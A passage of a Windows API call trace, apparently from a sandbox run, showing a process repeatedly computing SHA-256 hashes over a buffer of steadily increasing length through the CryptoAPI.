	[0225.132] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0225.132] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aa58
	[0225.132] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277aa58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aa58, pdwDataLen=0x128ba4) returned 1
	[0225.132] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.132] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.132] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.133] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.133] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0225.133] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aa80
	[0225.133] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277aa80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aa80, pdwDataLen=0x128ba4) returned 1
	[0225.133] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.133] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.133] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.133] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.133] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0225.133] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aaa8
	[0225.133] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277aaa8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aaa8, pdwDataLen=0x128ba4) returned 1
	[0225.133] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.133] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.133] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.134] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.134] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0225.134] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aad0
	[0225.134] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277aad0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aad0, pdwDataLen=0x128ba4) returned 1
	[0225.134] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.134] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.134] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.134] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.134] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0225.134] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aaf8
	[0225.134] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277aaf8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aaf8, pdwDataLen=0x128ba4) returned 1
	[0225.134] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.134] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.134] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.135] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.135] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0225.135] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ab20
	[0225.135] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ab20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ab20, pdwDataLen=0x128ba4) returned 1
	[0225.135] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.135] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.135] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.135] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.135] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0225.135] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ab48
	[0225.135] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ab48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ab48, pdwDataLen=0x128ba4) returned 1
	[0225.135] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.135] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.135] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.136] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.136] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0225.136] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ab70
	[0225.136] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ab70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ab70, pdwDataLen=0x128ba4) returned 1
	[0225.136] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.136] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.136] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.136] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.136] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0225.136] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ab98
	[0225.136] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ab98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ab98, pdwDataLen=0x128ba4) returned 1
	[0225.136] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.136] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.136] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.137] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.137] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0225.137] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277abc0
	[0225.137] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277abc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277abc0, pdwDataLen=0x128ba4) returned 1
	[0225.137] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.137] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.137] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.137] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.137] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0225.137] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277abe8
	[0225.137] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277abe8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277abe8, pdwDataLen=0x128ba4) returned 1
	[0225.137] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.137] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.137] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.138] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.138] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0225.138] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ac10
	[0225.138] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ac10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ac10, pdwDataLen=0x128ba4) returned 1
	[0225.138] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.138] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.138] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.138] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.138] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0225.138] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ac38
	[0225.138] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ac38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ac38, pdwDataLen=0x128ba4) returned 1
	[0225.138] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.138] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.138] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.139] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.139] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0225.139] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ac60
	[0225.139] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ac60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ac60, pdwDataLen=0x128ba4) returned 1
	[0225.139] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.139] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.139] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.139] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.139] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0225.139] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ac88
	[0225.139] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ac88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ac88, pdwDataLen=0x128ba4) returned 1
	[0225.139] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.139] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.139] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.140] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.140] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0225.140] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277acb0
	[0225.140] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277acb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277acb0, pdwDataLen=0x128ba4) returned 1
	[0225.140] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.140] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.140] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.141] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.141] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0225.141] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277acd8
	[0225.141] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277acd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277acd8, pdwDataLen=0x128ba4) returned 1
	[0225.141] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.141] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.141] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.141] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.141] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0225.142] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ad00
	[0225.142] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ad00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ad00, pdwDataLen=0x128ba4) returned 1
	[0225.142] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.142] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.142] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.142] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.142] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0225.142] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ad28
	[0225.142] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ad28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ad28, pdwDataLen=0x128ba4) returned 1
	[0225.142] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.142] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.142] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.142] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.143] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0225.143] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ad50
	[0225.143] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ad50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ad50, pdwDataLen=0x128ba4) returned 1
	[0225.143] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.143] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.143] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.143] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.143] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0225.143] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ad78
	[0225.143] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ad78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ad78, pdwDataLen=0x128ba4) returned 1
	[0225.143] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.143] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.143] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.144] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.144] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0225.144] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ada0
	[0225.144] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ada0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ada0, pdwDataLen=0x128ba4) returned 1
	[0225.144] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.144] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.144] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.144] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.144] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0225.144] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277adc8
	[0225.144] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277adc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277adc8, pdwDataLen=0x128ba4) returned 1
	[0225.144] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.144] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.144] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.145] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.145] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0225.145] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277adf0
	[0225.145] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277adf0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277adf0, pdwDataLen=0x128ba4) returned 1
	[0225.145] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.145] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.145] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.145] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.145] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0225.145] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ae18
	[0225.145] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ae18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ae18, pdwDataLen=0x128ba4) returned 1
	[0225.145] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.145] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.145] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.146] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.146] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0225.146] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
